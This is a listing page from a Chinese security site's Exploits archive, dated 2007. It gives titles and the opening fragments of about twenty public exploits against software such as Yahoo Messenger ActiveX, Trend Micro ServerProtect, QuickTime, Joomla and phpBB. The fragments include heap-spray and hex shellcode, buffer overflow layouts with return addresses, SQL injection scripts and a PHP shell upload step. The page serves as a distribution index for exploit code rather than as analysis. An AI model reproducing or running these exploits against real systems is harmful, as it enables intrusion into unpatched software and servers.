首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Ultra Crypto Component (CryptoX.dll <= 2.0) SaveToFile() Inscure Method
  日期:2007-09-11 10:48:23 点击:46 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbolbody bgcolor=#E0E0E0------------------------------------------------------------------------------------- bUltra Crypto Component (CryptoX.dll = 2.0) SaveToFile() Inscure Method/b ur
Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF
  日期:2007-09-10 10:48:50 点击:129 评论:0
!-- 18.48 01/09/2007 Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc file version: 2000.085.2004.00 product version: 8.05.2004 passing some fuzzy chars to Start method: EA
Microsoft Visual FoxPro 6.0 (FPOLE.OCX v. 6.0.8450.0) Remote PoC
  日期:2007-09-07 13:54:25 点击:63 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------------------------------------- b0-day: Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library (FPOLE.OCX v. 6
Trend Micro ServerProtect eng50.dll Stack Overflow Exploit
  日期:2007-09-06 15:11:42 点击:45 评论:0
/* * Copyright (c) 2007 devcode * * *^^ D E V C O D E ^^ * * Trend Micro ServerProtect eng50.dll Stack Overflow * [CVE-2007-1070] * * * Description: * A boundary error within a function in eng50.dll can be * exploited to cause a stack-based buffer ov
GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit
  日期:2007-09-06 14:25:08 点击:63 评论:0
html body object id=gl classid=clsid:1C9B434A-0898-498A-B802-B00FA0962214/object script document.write(meta http-equiv=refresh content=1, + window.location.href + /meta); var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape( %u9090%u9090
AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit
  日期:2007-09-06 14:17:51 点击:81 评论:0
?php /* AtomixMP3 2.3 (pls File) Local Buffer OverFlow ret addr - 0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002 exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ] By : 0x58 greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Met
Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit
  日期:2007-09-05 17:50:24 点击:44 评论:0
#!/usr/bin/perl #' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ #' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ #'++ Author: Koshi + #'++ Email: heykoshi at gmail dot com + #'++ Application: Microsoft Visual Basic 6.0 + #'++ + #'++
CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
  日期:2007-09-05 17:48:40 点击:93 评论:0
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit
Apple Quicktime < 7.2 SMIL Remote Integer Overflow PoC
  日期:2007-09-05 17:47:12 点击:89 评论:0
---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into running a malicious SMIL fil
OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit
  日期:2007-09-03 15:19:09 点击:62 评论:0
?php /* OTSTurntables 1.00 Buffer OverFlow 0days 224 bytes available for shellcode,, you can replace it with you favourite one,, 0x77394540 jmp esp in shell32.dll Winxp sp0 exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] if y
Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit
  日期:2007-09-03 15:17:42 点击:49 评论:0
!-- Yahoo! Messenger (YVerInfo.dll = 2007.8.27.1) ActiveX Control Buffer Overflows update YM : http://messenger.yahoo.com/security_update.php?id=082907 Functions : fvcom or info; RegKey Safe for Script: True RegKey Safe for Init: True - that function
Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit
  日期:2007-09-03 15:16:55 点击:68 评论:0
#!/usr/bin/php -q -d short_open_tag=on ?php /* Explanation: Although the comment points out that the filter variable is supposedly cleansed there is no input validation being performed except for the fact that all input is being turned into lowercase
CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
  日期:2007-09-03 15:15:44 点击:50 评论:0
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[4]) { print n |-------------------------------------------------|; print n | newhack[dot]org |; print n |-------------------------------------------------|; print n | CKGold Shopping
PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit
  日期:2007-09-03 15:14:53 点击:127 评论:0
// author: dummy // written by dummyz@126.com (2007) #define _CRT_SECURE_NO_DEPRECATE #include windows.h #include stdio.h const unsigned char shellcode[174] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE,
Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit
  日期:2007-09-03 15:13:49 点击:103 评论:0
#!/usr/bin/perl # Automatically generated by beSTORM(tm) # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) # Attack vector: # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 # Module: # DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::IN
phpBB Links MOD 1.2.2 Remote SQL Injection Exploit
  日期:2007-09-03 15:08:43 点击:85 评论:0
#!/usr/bin/perl print q{ phpBB = 2.0.22 - Links MOD = v1.2.2 Remote SQL Injection Exploit Bug discovered by Don Dork: allinurl:links.php?t=search or: Links MOD v1.2.2 by phpBB2.de SQL INJECTION: Exploit: links.php?t=searchsearch_keywords=asdstart=1,1
Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit
  日期:2007-08-31 11:05:50 点击:77 评论:0
/* Norman Virus Control nvcoaft51.sys ioctl BF672028 exploit Abstract nvcoaft51.sys driver receive as parameter in some ioctl's a pointer to a KEVENT struct, calling KeSetEvent without any prior check. The device created by the driver (NvcOa) can be
Hexamail Server 3.0.0.001 (pop3) pre-auth Remote Overflow PoC
  日期:2007-08-31 11:03:54 点击:44 评论:0
?php /* Hexamail Server 3.0.0.001 (pop3) pre-auth remote overflow poc by rgod http://retrogod.altervista.org tested against the Lite one this one crashes the entire server you are in control of eax and ecx, I think arbitrary code execution is possibl
Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
  日期:2007-08-30 20:04:50 点击:70 评论:0
#!/usr/bin/perl########################################################################################## Pakupaku CMS = 0.4 Remote File Upload Vulnerability # 1- [Path_Script]/index.php?page=Uploads # 2- Upload GoLd-M.php = [Php Shell] # 3- [Path_S
ABC estore 3.0 (cat_id) Blind SQL Injection
  日期:2007-08-30 20:03:39 点击:72 评论:0
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n |-------------------------------------------------|; print n | newhack[dot]org |; print n |-------------------------------------------------|; print n | ABC estore 3.0 (ca
共637页/12733条记录 首页 上一页 [540] [541] [542] 543 [544] [545] [546] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved